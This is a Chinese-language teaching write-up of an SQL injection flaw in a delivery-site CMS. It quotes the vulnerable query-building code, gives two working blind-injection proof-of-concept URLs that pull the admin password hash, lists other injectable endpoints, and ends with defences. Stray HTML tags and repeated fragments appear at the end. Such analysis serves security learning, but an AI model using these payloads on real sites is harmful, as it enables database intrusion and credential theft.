某CMS SQL注入漏洞分析与利用教学文档<\/h1>

0x01 漏洞概述<\/h2>
本漏洞存在于某CMS（外卖系统）的数据库查询处理逻辑中，由于对特定数组形式的查询条件过滤不严，导致可构造恶意SQL语句实现注入攻击。该漏洞属于ThinkPHP框架类注入漏洞的变种。<\/p>

0x02 漏洞分析<\/h2>

核心漏洞点<\/h3>

漏洞核心位于inc\/Lib\/Core\/Db.class.php<\/code>文件中的parseWhereItem<\/code>和parseValue<\/code>方法：<\/p>

protected<\/span> function<\/span> parseWhereItem<\/span>($key,$val) {
<\/span><\/span>    \/\/ ... 省略其他代码 ...
<\/span><\/span><\/span><\/span>    if<\/span>(is_array<\/span>($val)) {
<\/span><\/span>        if<\/span>(is_string<\/span>($val[0<\/span>])) {
<\/span><\/span>            if<\/span>(preg_match<\/span>('\/^(EQ|NEQ|GT|EGT|LT|ELT)$\/i'<\/span>,$val[0<\/span>])) {
<\/span><\/span>                \/\/ 比较运算
<\/span><\/span><\/span><\/span>            } elseif<\/span>(preg_match<\/span>('\/^(NOTLIKE|LIKE)$\/i'<\/span>,$val[0<\/span>])) {
<\/span><\/span>                \/\/ 模糊查找
<\/span><\/span><\/span><\/span>            } elseif<\/span>('exp'<\/span>==<\/span>strtolower<\/span>($val[0<\/span>])) { \/\/ 使用表达式
<\/span><\/span><\/span><\/span>                $whereStr .=<\/span> ' ('<\/span>.<\/span>$key.<\/span>' '<\/span>.<\/span>$val[1<\/span>].<\/span>') '<\/span>;  \/\/ 漏洞点1：直接拼接未过滤
<\/span><\/span><\/span><\/span>            } elseif<\/span>(preg_match<\/span>('\/IN\/i'<\/span>,$val[0<\/span>])) {
<\/span><\/span>                if<\/span>(isset<\/span>($val[2<\/span>]) &&<\/span> 'exp'<\/span>==<\/span>$val[2<\/span>]) {
<\/span><\/span>                    $whereStr .=<\/span> $key.<\/span>' '<\/span>.<\/span>strtoupper<\/span>($val[0<\/span>]).<\/span>' '<\/span>.<\/span>$val[1<\/span>]; \/\/ 漏洞点2：直接拼接未过滤
<\/span><\/span><\/span><\/span>                }
<\/span><\/span>                \/\/ ... 省略其他代码 ...
<\/span><\/span><\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞成因<\/h3>

过滤缺失<\/strong>：当val[0]<\/code>为'exp'时，直接拼接val[1]<\/code>到SQL语句中，未经过parseValue<\/code>过滤<\/li>
过滤缺失<\/strong>：当val[2]<\/code>为'exp'且val[0]<\/code>包含'IN'时，直接拼接val[1]<\/code>到SQL语句中<\/li>
<\/ol>
调用链分析<\/h3>
完整的漏洞调用链如下：<\/p>
find() -> select() -> buildSelectSql() -> parseSql() -> parseWhere() -> parseWhereItem()
<\/code><\/pre>
0x03 漏洞利用<\/h2>
利用条件<\/h3>

存在调用find()<\/code>方法的地方<\/li>
可以控制传入find()<\/code>的参数为一个数组<\/li>
数组格式满足以下两种形式之一：

array(0 => 'exp', 1 => '恶意SQL')<\/code><\/li>
array(0 => 'IN', 1 => '恶意SQL', 2 => 'exp')<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
利用POC<\/h3>
方式一：利用exp表达式<\/h4>
http:\/\/localhost:8888\/waimai-master\/index.php?m=product&a=index&id[0]=exp&id[1]=in%20(%27XX%27))\/**\/or%20substr((select%20userpass%20from%20sn_members%20where%20uid=1),1,1)=%279%27)%20--+
<\/span><\/span><\/span><\/code><\/pre>生成的SQL语句：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> sn_article WHERE<\/span> ((aid in<\/span> ('XX'<\/span>))\/**\/<\/span>or<\/span> substr((select<\/span> userpass from<\/span> sn_members where<\/span> uid=<\/span>1<\/span>),1<\/span>,1<\/span>)=<\/span>'9'<\/span>) -- ) ) LIMIT 1
<\/span><\/span><\/span><\/code><\/pre>方式二：利用IN表达式<\/h4>
http:\/\/localhost:8888\/waimai-master\/index.php?m=product&a=index&id[0]=in%20(%27xx%27))\/*&id[1]=*\/or%20substr((select%20userpass%20from%20sn_members%20where%20uid=1),1,1)=%279%27%20--%20&id[2]=exp
<\/span><\/span><\/span><\/code><\/pre>其他可利用的接口<\/h3>

产品模块：
\/index.php?m=product&a=index
<\/code><\/pre>
<\/li>
文章模块：
\/index.php?m=article&a=s
<\/code><\/pre>
<\/li>
后台食品管理：
\/admin.php?&m=food&a=edit
<\/code><\/pre>
<\/li>
后台食品分类：
\/admin.php?&m=foodcat&a=edit
<\/code><\/pre>
<\/li>
后台订单管理：
\/admin.php?&m=order&a=detail
\/admin.php?&m=order&a=orderfour
<\/code><\/pre>
<\/li>
<\/ol>
0x04 防御措施<\/h2>

严格过滤<\/strong>：所有用户输入的参数都应经过严格的过滤和转义<\/li>
参数化查询<\/strong>：使用预处理语句和参数化查询<\/li>
权限控制<\/strong>：数据库账户应使用最小权限原则<\/li>
代码审查<\/strong>：对类似parseWhereItem<\/code>的关键函数进行严格审查<\/li>
框架升级<\/strong>：使用最新版本的框架，避免已知漏洞<\/li>
<\/ol>
0x05 总结<\/h2>
该漏洞源于对特定格式的数组参数处理不当，导致SQL注入。攻击者可以通过构造特殊的数组参数绕过过滤机制，执行任意SQL语句。开发人员应特别注意对数组形式参数的处理，确保所有用户输入都经过适当的过滤和转义。<\/p>

某CMS SQL注入漏洞分析与利用教学文档<\/h1>

0x01 漏洞概述<\/h2> 本漏洞存在于某CMS（外卖系统）的数据库查询处理逻辑中，由于对特定数组形式的查询条件过滤不严，导致可构造恶意SQL语句实现注入攻击。该漏洞属于ThinkPHP框架类注入漏洞的变种。<\/p>

0x02 漏洞分析<\/h2>

0x03 漏洞利用<\/h2>

利用POC<\/h3>

0x01 漏洞概述<\/h2>
本漏洞存在于某CMS（外卖系统）的数据库查询处理逻辑中，由于对特定数组形式的查询条件过滤不严，导致可构造恶意SQL语句实现注入攻击。该漏洞属于ThinkPHP框架类注入漏洞的变种。<\/p>